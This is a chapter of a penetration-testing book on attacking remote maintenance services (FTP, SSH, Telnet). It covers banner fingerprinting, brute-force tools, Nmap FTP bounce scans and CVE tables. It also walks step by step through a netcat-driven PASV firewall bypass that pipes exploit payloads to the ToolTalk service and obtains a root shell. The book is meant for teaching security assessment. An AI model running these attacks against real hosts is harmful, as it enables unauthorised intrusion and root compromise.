Chapter 8. Assessing Remote Maintenance Services

This chapter covers the assessment of remote maintenance services that provide direct access to servers and devices for administrative purposes. Common remote maintenance services include FTP, SSH, Telnet, X Windows, VNC, Citrix, and Microsoft Terminal Services. Determined attackers often target remote maintenance services, as they provide direct access to the target host.

Remote Maintenance Services

Services used by network administrators to directly manage remote hosts over TCP/IP (e.g., SSH, Telnet, VNC, and others) are threatened by three categories of attack:

  • Information leak attacks, from which user and system details are extracted

  • Brute-force guessing of user passwords to gain direct system access

  • Process manipulation attacks (buffer overflows, format string bugs, etc.)

An online bank may be running the Telnet service on its Internet routers for administrative purposes. This service may not be vulnerable to information leak or process manipulation attacks, but a determined attacker can launch a brute-force attack against the service to gain access. Brute force is an increasingly popular attack vector for attackers attempting to break moderately secure networks.

I have derived this list of common remote maintenance services from the /etc/services file:

ftp             21/tcp
ssh             22/tcp
telnet          23/tcp
exec            512/tcp
login           513/tcp
shell           514/tcp
x11             6000/tcp
citrix-ica      1494/tcp
citrix-ica-brws 1604/udp
ms-rdp          3389/tcp
vnc-http        5800/tcp
vnc             5900/tcp


Windows services such as NetBIOS and CIFS can also be used for remote maintenance purposes (scheduling commands, file access, etc.). Due to the complexity of the Windows networking model, these services are fully discussed in Chapter 10.


FTP services provide remote access to files, usually for maintenance of web servers and similar purposes. FTP services use the following two ports to function: TCP port 21, which is the inbound server control port that accepts and processes FTP commands from the client, and TCP port 20, which is the outbound data port used to send data from the server to the client. File transfers are orchestrated over the control port (21), where commands such as PORT are issued to initiate a data transfer using the outbound data port. RFC 959 describes and outlines FTP and its various modes and commands in detail.

FTP services are susceptible to the following classes of attack:

  • Brute-force password grinding

  • FTP bounce port scanning and exploit payload delivery

  • Process manipulation, including overflow attacks involving malformed data

Older firewalls and proxy servers can also be abused if FTP services are accessible through them, by sending crafted PORT commands to provide access to other ports on the target server.

FTP Banner Grabbing and Enumeration

Upon finding a server running FTP, the first piece of information discovered by connecting to the service is the FTP server banner:

$ ftp
Connected to (
220 darkside FTP server ready.
Name (

Here, the banner is that of a Solaris 9 server. Solaris 8 (also known as SunOS 5.8) and earlier return the operating system detail in a slightly different banner, as follows:

$ ftp
Connected to (
220 lackie FTP server (SunOS 5.8) ready.
Name (

If the banner is obfuscated or modified to remove service version or operating system information, the service can sometimes be identified by analyzing responses to quote help and syst commands upon login, as shown in Example 8-1.

Example 8-1. Fingerprinting FTP services by issuing commands
$ ftp
Connected to (
220 FTP server ready.
Name ( ftp
331 Guest login ok, send your complete e-mail address as password.
Password: [email protected]
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote help
214-The following commands are recognized (* =>'s unimplemented).
   USER    PORT    STOR    MSAM*   RNTO    NLST    MKD     CDUP
   ACCT*   TYPE    MLFL*   MRCP*   DELE    SYST    RMD     STOU
   SMNT*   STRU    MAIL*   ALLO    CWD     STAT    XRMD    SIZE
   REIN*   MODE    MSND*   REST    XCWD    HELP    PWD     MDTM
214 Direct comments to [email protected]
ftp> syst
215 UNIX Type: L8 Version: SUNOS

In this example, the FTP service type and version details aren’t revealed in the banner. However, by querying the server when logged in, I learn it is a Sun Microsystems FTP daemon. By performing IP fingerprinting of the port, I can probably ascertain which version of Solaris is running.

Analyzing FTP banners

To analyze FTP service banners you will grab when performing assessment exercises, use the banner list in Table 8-1.

Table 8-1. Common FTP banners and respective operating platforms

Operating system

FTP banner

Solaris 9 and later

220 hostname FTP server ready

Solaris 8

220 hostname FTP server (SunOS 5.8) ready

Solaris 7

220 hostname FTP server (SunOS 5.7) ready

SunOS 4.1.x

220 hostname FTP server (SunOS 4.1) ready

FreeBSD 4.x and later

220 hostname FTP server (Version 6.00LS) ready

FreeBSD 3.x

220 hostname FTP server (Version 6.00) ready

NetBSD 1.6.x

220 hostname FTP server (NetBSD-ftpd 20020615) ready

NetBSD 1.5.x

220 hostname FTP server (NetBSD-ftpd 20010329) ready


220 hostname FTP server (Version 6.5/OpenBSD) ready


220 hostname FTP server ready


220 hostname FTP server (Version 4.1 Tue Sep 8 17:35:59 CDT 1998) ready

Compaq Tru64

220 hostname FTP server (Digital Unix Version 5.60) ready

HP-UX 11.x

220 hostname FTP server (Version Wed Feb 9 08:03:34 GMT 2000) ready

Apple MacOS X

220 hostname FTP server (Version: Mac OS X Server 10.4.14 - +GSSAPI) ready

Apple MacOS

220 hostname FTP server (Version 6.00) ready

Windows 2003

220 Microsoft FTP Service

Windows 2000

220 hostname Microsoft FTP Service (Version 5.0)

Windows NT 4.0

220 hostname Microsoft FTP Service (Version 4.0)

Linux and BSD-derived systems (including Mac OS X) are often found running other FTP implementations, including WU-FTPD, ProFTPD, NcFTPd, vsftpd, and Pure-FTPd. Table 8-2 lists FTP banners for these implementations.

Table 8-2. Other FTP implementation banners

FTP implementation

FTP banner

WU-FTPD 2.6.2

220 hostname FTP server (Version wu-2.6.2(1) Wed Dec 1 13:50:11 2004) ready

VsFTPd 2.0.4

220 (vsFTPd 2.0.4)


220 ---------- Welcome to Pure-FTPd ----------

ProFTPD 1.2.4

220 ProFTPD 1.2.4 Server (hostname) [hostname]


220 hostname NcFTPd Server (licensed copy) ready

Assessing FTP Permissions

Upon gaining access to the FTP service, you should assess exactly what kind of access you have to the accessible directory structure. To work correctly, many FTP exploits require that an attacker be able to create files and directories. Example 8-2 shows an anonymous FTP session and the file permissions returned.

Example 8-2. Connecting to a Solaris 2.5.1 FTP server
$ ftp
Connected to
220 hyperon FTP server (UNIX(r) System V Release 4.0) ready.
Name ( ftp
331 Guest login ok, send ident as password.
Password: [email protected]
230 Guest login ok, access restrictions apply.
ftp> ls
227 Entering Passive Mode (192,168,189,10,156,68)
150 ASCII data connection for /bin/ls
total 14
lrwxrwxrwx   1 0        1           7 Jun  6  1997 bin -> usr/bin
dr-xr-xr-x   2 0        1         512 Jun  6  1997 dev
dr--------   2 0        1         512 Nov 13  1996 etc
dr-xr-xr-x   3 0        1         512 May  7 12:21 org
dr-xr-xr-x   9 0        1         512 May  7 12:23 pub
dr-xr-xr-x   5 0        1         512 Nov 29  1997 usr
-rw-r--r--   1 0        1         227 Nov 19  1997 welcome.msg
226 ASCII Transfer complete.

Here I have no write access to the server and can’t read anything under /etc or traverse into that directory. The welcome.msg file is accessible, but that’s about it.

Regardless of whether you’re logged into a Unix or Windows-based FTP server, the Unix-like permission structure is the same. Example 8-3 shows the permissions found on Microsoft’s public FTP server.

Example 8-3. Assessing permissions on
$ ftp
Connected to (
220 Microsoft FTP Service
Name ( ftp
331 Anonymous access allowed, send identity (e-mail) as password.
Password: [email protected]
230-This is FTP.Microsoft.Com.
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> ls
227 Entering Passive Mode (207,46,133,140,53,125).
125 Data connection already open; Transfer starting.
dr-xr-xr-x   1 owner    group            0 Nov 25  2002 bussys
dr-xr-xr-x   1 owner    group            0 May 21  2001 deskapps
dr-xr-xr-x   1 owner    group            0 Apr 20  2001 developr
dr-xr-xr-x   1 owner    group            0 Nov 18  2002 KBHelp
dr-xr-xr-x   1 owner    group            0 Jul  2  2002 MISC
dr-xr-xr-x   1 owner    group            0 Dec 16  2002 MISC1
dr-xr-xr-x   1 owner    group            0 Feb 25  2000 peropsys
dr-xr-xr-x   1 owner    group            0 Jan  2  2001 Products
dr-xr-xr-x   1 owner    group            0 Apr  4 13:54 PSS
dr-xr-xr-x   1 owner    group            0 Sep 21  2000 ResKit
dr-xr-xr-x   1 owner    group            0 Feb 25  2000 Services
dr-xr-xr-x   1 owner    group            0 Feb 25  2000 Softlib
226 Transfer complete.

By reviewing the permissions of the Microsoft FTP service in Example 8-3, I find that I have no write access to the FTP server. The permission structure in its simplest sense is shown in Figure 8-1.

Unix file permissions
Figure 8-1. Unix file permissions

The first character defines the type of filesystem object being listed; directories are defined with a d, and symbolic links are defined with a l. The nine characters that follow the file descriptor character define the owner, group, and other permissions for that file or directory. In Example 8-3, the owner has full read, write, and execute access, and group and other users have only read and execute access.

UUNet runs an FTP server that allows users to upload files to a temporary directory, shown in Example 8-4.

Example 8-4. The UUNet FTP server allows uploads to /tmp
$ ftp
Connected to (
220 FTP server ready.
Name ( ftp
331 Guest login ok, send your complete e-mail address as password.
Password: [email protected]
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,48,96,9,225,134)
150 Opening ASCII mode data connection for /bin/ls.
total 199770
d-wx--s--x   6 1            512 Jun 28  2001 etc
d--xr-xr-x   3 1            512 Sep 18  2001 home
drwxr-sr-x  20 21          1024 Jun 29  2001 index
drwxr-sr-x   2 1            512 Jun 29  2001 inet
drwxr-sr-x   5 1            512 Apr 10 14:28 info
d--x--s--x  44 1           1024 Apr 16 19:41 private
drwxr-sr-x   5 1           1024 Mar  8 02:41 pub
drwxrwxrwt  35 21          1536 May 18 10:30 tmp
d-wx--s--x   3 1            512 Jun 28  2001 usr
-rw-r--r--   1 21       8520221 Jun 29  2001 uumap.tar.Z
drwxr-sr-x   2 1           2048 Jun 29  2001 vendor
226 Transfer complete.

Because I am logged in anonymously, I am interested in the last three characters of the permission information returned (drwxrwxrwt in total, with rwt relating to me). The r and w permissions mean that I have standard read and write access to the /tmp directory, and the t bit (known as the sticky bit) ensures that files can’t be deleted or renamed after being created in the directory.

FTP Brute-Force Password Guessing

THC Hydra is a fast Unix-based brute-force utility for FTP, POP-3, IMAP, HTTP, LDAP, and many other services; Brutus is a similar Windows tool. These tools are available from the following locations:

FTP Bounce Attacks

As outlined in Chapter 4, FTP services bundled with the following outdated operating platforms are vulnerable to bounce attacks in which port scans or malformed data can be sent to arbitrary locations via FTP:

  • FreeBSD 2.1.7 and earlier

  • HP-UX 10.10 and earlier

  • Solaris 2.6 and earlier

  • SunOS 4.1.4 and earlier

  • SCO OpenServer 5.0.4 and earlier

  • SCO UnixWare 2.1 and earlier

  • IBM AIX 4.3 and earlier

  • Caldera Linux 1.2 and earlier

  • Red Hat Linux 4.2 and earlier

  • Slackware 3.3 and earlier

  • Any Linux distribution running WU-FTPD 2.4.2-BETA-16 or earlier

If you know that an FTP service is running on an internal network and is accessible through NAT, bounce attacks can be used to probe and attack other internal hosts and even the server running the FTP service itself.

FTP bounce port scanning

You can use Nmap to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

            nmap -P0 -b username:password@ftp-server:port <target host>

Example 8-5 shows an FTP bounce port scan being launched through the Internet-based to scan an internal host at, a known address previously enumerated through DNS querying.

Example 8-5. FTP bounce scanning with Nmap
$ nmap -P0 -b -p21,22,23,25,80

Starting Nmap 4.10 ( ) at 2007-04-01 20:39 UTC
Interesting ports on  (
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
23/tcp     closed      telnet
25/tcp     closed      smtp
80/tcp     open        http


When performing any type of bounce port scan with Nmap, you should specify the -P0 option, as the host will be inaccessible in some cases. More importantly, it prevents probe packets from being sent from your host to the target network that reveals the true source of the scan.

FTP bounce exploit payload delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to a bounce attack, you can then send that information to a specific service port. This concept is shown in Figure 8-2.

An illustration of the FTP payload bounce attack
Figure 8-2. An illustration of the FTP payload bounce attack

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writable directory, and test to see if the server is susceptible to FTP bounce attacks. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent unsolicited email messages this way.

Since 1995 when Hobbit released his first white paper on the issue of FTP abuse, a number of similar documents and approaches have been detailed. The CERT web site has a good description of the issue with background information, accessible at

Circumventing Stateful Filters Using FTP

At Black Hat Briefings 2000 in Las Vegas, Thomas Lopatic et al. presented “A Stateful Inspection of Firewall-1” (available at, which documented a raft of security issues with Check Point Firewall-1 4.0 SP4. One area covered was abusing FTP access to a host through a stateful firewall in order to open ports and gain access to services that should otherwise be filtered.

FTP is a complex protocol used to transfer files that have two channels: the control channel (using TCP port 21) and the data channel (using TCP port 20). The PORT and PASV commands are issued across the control channel to determine which dynamic high ports (above 1024) are used to transfer and receive data.


The PORT command defines a dynamic high port from which the client system receives data. Most firewalls perform stateful inspection of FTP sessions, so the PORT command populates the state table.

Figure 8-3 shows a client system that connects to an FTP server through a firewall and issues a PORT command to receive data. A short explanation of the command follows.

The PORT command populates the firewall state table
Figure 8-3. The PORT command populates the firewall state table

The reason that port 1039 is opened is because the last two digits in the PORT command argument (4 and 15) are first converted to hexadecimal:

  • 4 becomes 0x04

  • 15 becomes 0x0F

The two values then concatenate to become 0x040F, and a tool such as the Base Converter application found in Hex Workshop (available from is used to find the decimal value, as shown in Figure 8-4.

Converting the concatenated hex value to a port number
Figure 8-4. Converting the concatenated hex value to a port number

Most modern commercial firewalls (with the exception of earlier Cisco PIX releases) enforce the rule that FTP holes punched through the firewall must be to ports above 1024. For example, if an attacker could send a crafted outbound PORT command as part of an established FTP session from the protected server (i.e., the FTP server in Figure 8-2), he could access services running on high ports, such as RPC services.

PASV abuse

Lopatic et al. built on the PORT abuse approach and came up with an attack involving abuse of the PASV command. This attack fools stateful firewalls (Check Point Firewall-1, Cisco PIX, etc.) into opening high ports on a protected FTP server, in turn allowing for direct exploitation via a crafted exploit payload that is delivered through the firewall to the open high port.

By advertising a small Maximum Transmission Unit (MTU) value, an attacker can abuse the PASV command and open ports on the target FTP server through a stateful firewall such as Check Point Firewall-1 or Cisco PIX.

In the following example (demonstrated at Black Hat 2000), John McDonald compromised an unpatched Solaris 2.6 server behind a Check Point Firewall-1 appliance filtering access to all ports except for FTP (TCP port 21).

McDonald crafted two exploit payloads (named killfile and hackfile) to overflow the TTDB service running on TCP port 32775 of the target host. For the exploit to be effective, the TTDB service must be forcefully restarted using killfile, then hackfile replaces the /usr/sbin/in.ftpd binary with /bin/sh. The following is a demonstration of this process.

First, set the MTU for the network card of the Linux launch system to 100:

$ /sbin/ifconfig eth0 mtu 100

Next, connect to the target FTP server ( on port 21 using Netcat (a useful networking tool that is available from, and issue a long string of characters followed by a crafted FTP server response:

$ nc -vvv 21 inverse host lookup failed:
(UNKNOWN) [] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
XXXXXXXXXXXXXXXXXXXXX227 (172,16,0,2,128,7)
500 Invalid command given: XXXXXXXXXXXXXXXXXXXXX
[1]+ Stopped nc -vvv 21

The effect of setting the low MTU is detailed in Figure 8-5, resulting in the 227 (172,16,0,2,128,7) server response being processed by the firewall and added to the state table. You can now send data to TCP port 32775 on

The FTP error response is broken by the low MTU
Figure 8-5. The FTP error response is broken by the low MTU

Now that the port is open, use Netcat to push the killfile binary data to port 32775 and restart the TTDB service:

$ cat killfile | nc -vv 32775 inverse host lookup failed:
(UNKNOWN) [] 32775 (?) open
sent 80, rcvd 0

Then repeat the process to reopen the port on the target server:

$ nc -vvv 21 inverse host lookup failed:
(UNKNOWN) [] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
XXXXXXXXXXXXXXXXXXXXX227 (172,16,0,2,128,7)
500 Invalid command given: XXXXXXXXXXXXXXXXXXXXX
[2]+ Stopped nc -vvv 21

Next, push the hackfile binary data, exploiting the TTDB service fully:

$ cat hackfile | nc -vv 32775 inverse host lookup failed:
(UNKNOWN) [] 32775 (?) open
sent 1168, rcvd 0

If the buffer overflow has been successful, the FTP server binary is replaced with /bin/sh, giving command-line root access to the host:

$ nc -vvv 21 inverse host lookup failed:
(UNKNOWN) [] 21 (?) open
uid=0(root) gid=0(root)

FTP Process Manipulation Attacks

If an attacker can accurately identify the target FTP service and the operating platform and architecture of the target server, it is relatively straightforward to identify and launch process manipulation attacks to gain access to the server.

Most serious remote buffer overflows in FTP services are postauthentication issues; they require authenticated access to the FTP service and its underlying commands. Increasingly, write access is also required to create complex directory structures server-side that allow exploitation.

Solaris and BSD FTP glob( ) issues

A number of glob( ) function vulnerabilities were uncovered in 2001 that related to Solaris and BSD FTP implementations. These issues are discussed here with practical exploitation examples.

Solaris glob( ) username grinding

The following glob( ) bug is present in default Solaris installations up to Solaris 8. By issuing a series of CWD ~username requests, an attacker can effectively enumerate valid user accounts without even logging into the FTP server. This issue is referenced in MITRE CVE as CVE-2001-0249. Username grinding using this bug is demonstrated in Example 8-6. In this example, the blah and test users don’t exist, but chris does.

Example 8-6. Solaris 8 FTP username grinding
$ telnet 21
Connected to
Escape character is '^]'.
220 lackie FTP server (SunOS 5.8) ready.
CWD ~blah
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~test
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~chris
530 Please login with USER and PASS.
221 Goodbye.
Other Solaris glob( ) issues

A similar postauthentication glob( ) bug can be exploited, which results in a heap overflow and core dump that can be abused by local users to reveal sensitive system and environment data. This heap overflow issue is referenced within MITRE CVE as CVE-2001-0421.

No public preauthentication exploits have been released to compromise Solaris hosts by abusing glob( ) issues. Theoretically, the service can be exploited under Solaris if write access to the filesystem is permitted through FTP (see CVE-2001-0249), although this may be difficult to exploit.

Neither CORE IMPACT, Immunity CANVAS, nor the Metasploit Framework (MSF) has support for these Solaris FTP glob( ) issues (CVE-2001-0249 and CVE-2001-0421) at the time of this writing.

BSD glob( ) vulnerabilities

The FTP glob( ) function used under BSD-derived systems (NetBSD, OpenBSD, and FreeBSD) is also susceptible to attack, due to the way heap memory is managed, as described in CVE-2001-0247. An exploit script for this issue is available at CORE IMPACT also supports this bug, but Immunity CANVAS does not at the time of this writing.

WU-FTPD vulnerabilities

WU-FTPD is a popular and easy-to-manage FTP service that many system administrators run across multiple Unix-like platforms (primarily Linux). Table 8-3 lists remotely exploitable WU-FTPD vulnerabilities with corresponding MITRE CVE references.

Table 8-3. Remotely exploitable WU-FTPD vulnerabilities

CVE reference





WU-FTPD 2.6.2 S/KEY stack overflow



WU-FTPD 2.6.2 realpath( ) off-by-one bug



WU-FTPD 2.6.1 glob( ) heap overflow



WU-FTPD 2.6.1 PASV command format string bug



WU-FTPD 2.6.0 SITE EXEC command format string bug



WU-FTPD 2.5.0 CWD command stack overflow



WU-FTPD 2.4.2 BETA 18 DELE command stack overflow

The majority of these issues are exploited postauthentication, requiring access to commands such as CWD and DELE upon logging in. They also sometimes require writable filesystem access from the FTP account in use to create file and directory structures.

WU-FTPD exploit scripts

The following public exploit scripts are available for a number of these vulnerabilities in the accompanying tools archive for this book, at These exploit scripts are detailed in Table 8-4.

Table 8-4. Publicly available WU-FTPD exploit scripts

CVE reference

WU-FTPD version

Target platform(s)

Exploit script











Linux and FreeBSD



2.5.0 and prior




2.4.2 and prior



MSF has an exploit module for CVE-2000-0573 (SITE EXEC command format string bug), but not for these other vulnerabilities at the time of this writing. For the full list of exploit modules that MSF supports in its stable branch, see

In terms of commercial exploitation frameworks, CORE IMPACT supports CVE-2000-0573 and CVE-2001-0550 (glob( ) heap overflow), and Immunity CANVAS only supports CVE-2000-0573 at the time of this writing.

ProFTPD vulnerabilities

ProFTPD is similar to WU-FTPD in that it can be run from multiple operating platforms. I often see ProFTPD running on FreeBSD and Slackware Linux in the wild. Table 8-5 lists serious remotely exploitable issues in ProFTPD as listed in MITRE CVE.

Table 8-5. Remotely exploitable ProFTPD vulnerabilities

CVE reference





ProFTPD 1.3.0a mod_tls overflow



ProFTPD 1.3.0 sreplace( ) off-by-one bug



ProFTPD 1.3.0rc1 mod_radius long password overflow



ProFTPD 1.2.10 timing attack results in user enumeration



ProFTPD 1.2.7 to 1.2.9rc2 RETR command overflow



ProFTPD 1.2.7 to 1.2.9rc2 ASCII transfer mode newline character overflow



ProFTPD 1.2.0rc1 contains multiple format string vulnerabilities that can be exploited remotely



ProFTPD 1.2.0pre5 MKD and CWD nested directory stack overflow

ProFTPD exploit scripts

The following public exploit scripts are available for a number of these vulnerabilities in the accompanying tools archive for this book, at These exploit scripts are detailed in Table 8-6.

Table 8-6. Publicly available ProFTPD exploit scripts

CVE reference

ProFTPD version

Target platform(s)

Exploit script


1.2.7 to 1.2.9rc2






pro.tar.gz, proftpd.c, and proftpX.c

MSF has no exploit modules for ProFTPD at the time of writing. CORE IMPACT supports CVE-2006-5815 (sreplace( ) off-by-one bug) and CVE-2004-0346 (RETR command overflow). Immunity CANVAS does not support any ProFTPD issues at this time.

Microsoft IIS FTP server

At the time of writing, the only serious vulnerabilities that threaten Microsoft IIS FTP services are denial-of-service issues, usually exploitable through an authenticated FTP session. Two remotely exploitable security issues in the IIS 4.0 and 5.0 FTP services are listed within MITRE CVE as CVE-2001-0335 and CVE-1999-0777; both are medium-risk issues relating to information leakage from the service.

A common oversight is for system administrators to set up Internet-based IIS FTP servers and leave anonymous guest access to the server enabled. I have seen such open servers used as public storage and distribution centers for pirated software and other material.

Table 8-7 lists known remotely exploitable and significant issues in other third-party FTP server packages. Exploitation frameworks, including MSF and CORE IMPACT, support a number of these issues.

Table 8-7. Other remotely exploitable bugs in third-party FTP services

CVE reference(s)





WS_FTP Server 5.05 checksum command parsing overflow



FreeFTPd 1.0.10 key exchange algorithm buffer overflow

CVE-2005-3684 and CVE-2005-3683


Various FreeFTPd 1.0.8 command overflows



Serv-U FTP SITE CHMOD command stack overflow



Serv-U FTP default local administrative account



WS_FTP Server 5.03 MKD command overflow



Serv-U FTP MDTM command overflow



vsFTPd 1.1.3 username enumeration bug



Serv-U FTP 2.5h directory traversal attack


Secure Shell (SSH) services provide encrypted access to Unix and Windows systems, allowing command-line shell access, file access (using Secure Copy (SCP) and Secure FTP (SFTP) subsystems), and simple VPN services (using SSH port forwarding). Weaknesses in plaintext services such as Telnet were often abused by attackers to compromise networks, so SSH was developed to provide encrypted access to servers for maintenance purposes.

Before 1999, the only SSH servers available were for commercial use and were provided by SSH Communications ( and F-Secure ( In late 1999, the OpenBSD team worked to provide SSH support in version 2.6 of their operating system, and OpenSSH 1.2.2 was born. Commercial versions provided by SSH Communications and F-Secure remain supported and are sold, but OpenSSH has proved to be extremely popular and is now included with most Linux distributions.

Due to its cryptographic nature, an SSH client is required to connect to and authenticate with SSH. The free OpenSSH package can be downloaded from For Windows users, PuTTY is a free tool with a host of other SSH utilities (including PSCP, PSFTP, and Plink), available from

SSH Fingerprinting

To correctly ascertain vulnerabilities that may be present in the target SSH service, first perform banner grabbing by using Telnet or Netcat to connect to the SSH service. Example 8-7 shows that upon connecting to the target host, it is found to be running OpenSSH 3.5p1 using the SSH 2.0 protocol.

Example 8-7. Grabbing the SSH service banner using Telnet
$ telnet 22
Connected to
Escape character is '^]'.

Security-conscious administrators will often modify the SSH banner to present false information. Example 8-8 shows this: the SSH service supports the SSH 2.0 protocol, but the actual type and version of the service itself is unknown (it’s set to 0.0.0).

Example 8-8. Grabbing a modified SSH service banner
$ telnet 22
Connected to
Escape character is '^]'.

Table 8-8 shows a list of common SSH service banners and their respective vendor implementations.

Table 8-8. SSH banners and respective implementations

SSH implementation

FTP banner

Cisco IOS




SSH communications (commercial)


F-Secure SSH (commercial)


SSH protocol support

If SSH-1.99 is reported by the SSH service, both SSH 1.5 and 2.0 protocols are supported. Some SSH clients, such as PuTTY, didn’t previously support SSH 2.0, and many administrators accordingly ran their services to be backward-compatible.

SSH Brute-Force Password Grinding

By its very design, SSH is a protocol that is resilient to brute-force attacks. The service first accepts the username and then allows for three passwords to be provided. If the user fails to provide the correct username and password combination, the unauthorized access attempt is written to the system log.

Sebastian Krahmer wrote a multithreaded SSH2 brute-force tool called guess-who. The utility allows for up to 30 attempts per second on internal networks, so mileage varies across the Internet depending on server configuration and connection speed. The tool compiles cleanly in Unix environments; you can find it at

An expect script available from is a simple way to perform brute-force attacks against both SSH1 and SSH2 services. The 55hb script simply parses usernames and passwords to the Unix SSH client binary.

SSH Vulnerabilities

The presence of process manipulation vulnerabilities within SSH services depends on three factors:

  • The SSH server and version (OpenSSH, Cisco SSH, or commercial SSH variants)

  • SSH protocol support (1.0, 1.5, 1.99, or 2.0)

  • Authentication mechanisms in use (PAM, S/KEY, BSD_AUTH, or others)

Knowing the SSH service type, version, and which protocols are supported, you can check vulnerability databases and sites, including MITRE CVE, ISS X-Force, SecurityFocus, and Packet Storm, to ascertain whether the services at hand are vulnerable to attack. Table 8-9 lists remotely exploitable SSH vulnerabilities with corresponding MITRE CVE references.

Table 8-9. Remotely exploitable SSH vulnerabilities

CVE reference(s)





OpenSSH 4.6 S/KEY username enumeration bug



pam_ssh 1.91 authentication bypass



FortressSSH SSH_MSG_KEXINIT stack overflow



FreeSSHd 1.0.9 key exchange overflow



OpenSSH 3.7.1p1 PAM conversion overflow



OpenSSH 3.7.1p1 PAM authentication failure



OpenSSH 3.7 contains buffer management errors



OpenSSH 3.6.1p1 username grinding bug

CVE-2002-1357 through CVE-2002-1360


Multiple SSH key exchange and initialization bugs



OpenSSH 3.3 challenge-response integer overflow



OpenSSH 3.0.2 channel_lookup( ) off-by-one exploit



OPIE 2.4 username enumeration bug, exploitable via OpenSSH



SSH CRC32 attack detection code integer overflow bug

SSH exploit scripts

The following public exploit scripts are available for a number of these vulnerabilities in the accompanying tools archive for this book, at These exploit scripts are detailed in Table 8-10.

Table 8-10. Publicly available SSH exploit scripts

CVE reference

SSH implementation

Target platform

Exploit script(s)


OpenSSH 3.6.1p1




OpenSSH 2.9.9-3.3




OpenSSH 2.2.0p1


cm-ssh.tgz and x2src.tgz

MSF has an exploit module for CVE-2006-2407 (FreeSSHd 1.0.9 key exchange overflow), but not for these other vulnerabilities at the time of this writing. For the full list of exploit modules that MSF supports in its stable branch, see

CORE IMPACT supports CVE-2003-0786, CVE-2002-0639, and CVE-2002-0083 (various OpenSSH vulnerabilities). Immunity CANVAS does not support any of these issues at the time of this writing.


Telnet is a plaintext remote management service that provides command-line shell access to multiple server operating systems including Unix and Windows, and to devices such as Cisco routers and managed switches.

From a security perspective, the Telnet protocol is weak because all data (including authentication details) is transmitted in plaintext and can be sniffed by determined attackers. Once authenticated users are connected through Telnet, their sessions can also be hijacked and commands injected to the underlying operating system by attackers with access to the same network segment.

Telnet Service Fingerprinting

From a remote Internet-based perspective, you can use automated software, such as TelnetFP, to fingerprint Telnet services. A second approach is to manually grab the service banner and compare it with a known list of responses. I discuss these two approaches with practical examples.


You can use TelnetFP to accurately fingerprint the Telnet services of Windows, Solaris, Linux, BSD, SCO, Cisco, Bay Networks, and other operating platforms, based on low-level responses. The tool even has a scoring system to guess the service if an exact match isn’t seen. TelnetFP can be downloaded from

After downloading and compiling TelnetFP, you can run it as follows:

$ ./telnetfp
telnetfp0.1.2 by palmers / teso
Usage: ./telnetfp [-v -d <file>] <host>
        -v:         turn off verbose output
        -t <x>:     set timeout for connect attemps
        -d <file>:  define fingerprints file
        -i (b|a):   interactive mode. read either b)inary or a)scii

The following is a good live example from a recent penetration test I undertook against a series of branch offices for a client (the host at closes the connection immediately with a logon failed response):

$ telnet
Connected to
Escape character is '^]'.
logon failed.
Connection closed by foreign host.

Using TelnetFP, it’s possible to identify the Telnet service as that of a Multi-Tech Systems Firewall:

$ ./telnetfp
telnetfp0.1.2 by palmers / teso
DO:   255 251 3
DONT: 255 251 1
Found matching fingerprint: Multi-Tech Systems Firewall Version 3.00

Example 8-9 shows TelnetFP being run against a Linux host and a Cisco IOS router. Note that the tool doesn’t get an exact match for the Cisco device, but makes an educated guess.

Example 8-9. Using TelnetFP to fingerprint various Telnet services
$ ./telnetfp
telnetfp0.1.2 by palmers / teso
DO:   255 253 24 255 253 32 255 253 35 255 253 39
DONT: 255 250 32 1 255 240 255 250 35 1 255 240 255 250 39 1 255 24
Found matching fingerprint: Linux

$ ./telnetfp
telnetfp0.1.2 by palmers / teso
DO:   255 251 1 255 251 3 255 253 24 255 253 31
DONT: 13 10 13 10 85 115 101 114 32 65 99 99 101 115 115 32 86 101
Found matching fingerprint:
Warning: fingerprint contained wildcards! (integrity: 50)
probably some cisco

Manual Telnet fingerprinting

You can use the Telnet client to connect directly to an accessible Telnet service and fingerprint it based on the banner. The following Cisco Telnet service at presents a standard Cisco IOS banner and password prompt:

$ telnet
Connected to
Escape character is '^]'.

User Access Verification


I have assembled a common Telnet banner list in Table 8-11 to help you accurately identify services and the underlying operating platforms.

Table 8-11. Common Telnet banner list

Operating system

Telnet banner

Solaris 9

SunOS 5.9

Solaris 8

SunOS 5.8

Solaris 7

SunOS 5.7

Solaris 2.6

SunOS 5.6

Solaris 2.4 or 2.5.1

Unix(r) System V Release 4.0 (hostname)

SunOS 4.1.x

SunOS Unix (hostname)


FreeBSD/i386 (hostname) (ttyp1)


NetBSD/i386 (hostname) (ttyp1)


OpenBSD/i386 (hostname) (ttyp1)

Red Hat 8.0

Red Hat Linux release 8.0 (Psyche)

Debian 3.0

Debian GNU/Linux 3.0 / hostname


IRIX (hostname)

IBM AIX 5.2.x

AIX Version 5 (C) Copyrights by IBM and by others 1982, 2000.

IBM AIX 4.2.x or 4.3.x

AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

IBM AIX 4.1.x

AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

Nokia IPSO

IPSO (hostname) (ttyp0)

Cisco IOS

User Access Verification

Livingston ComOS

ComOS - Livingston PortMaster

Telnet Brute-Force Password Grinding

If services such as Sendmail are accessible, you can enumerate local users and attempt to gain access through Telnet. Chapter 5 and Chapter 11 cover enumeration techniques using various services like SMTP, SNMP, LDAP, and others.

Telnet services can be brute-forced using THC Hydra and Brutus, available from:

Brutus is a Windows graphical brute-force tool capable of running parallel login attempts. Figure 8-6 shows the user interface and options to use when launching a Telnet password-grinding attack.

The Brutus password-grinding tool
Figure 8-6. The Brutus password-grinding tool

Common device Telnet passwords

Many devices such as routers, switches, and print servers are often left with default administrative passwords set. Table 8-12 lists common strings you should attempt for both usernames and passwords when brute-forcing network devices.

Table 8-12. Common device password list
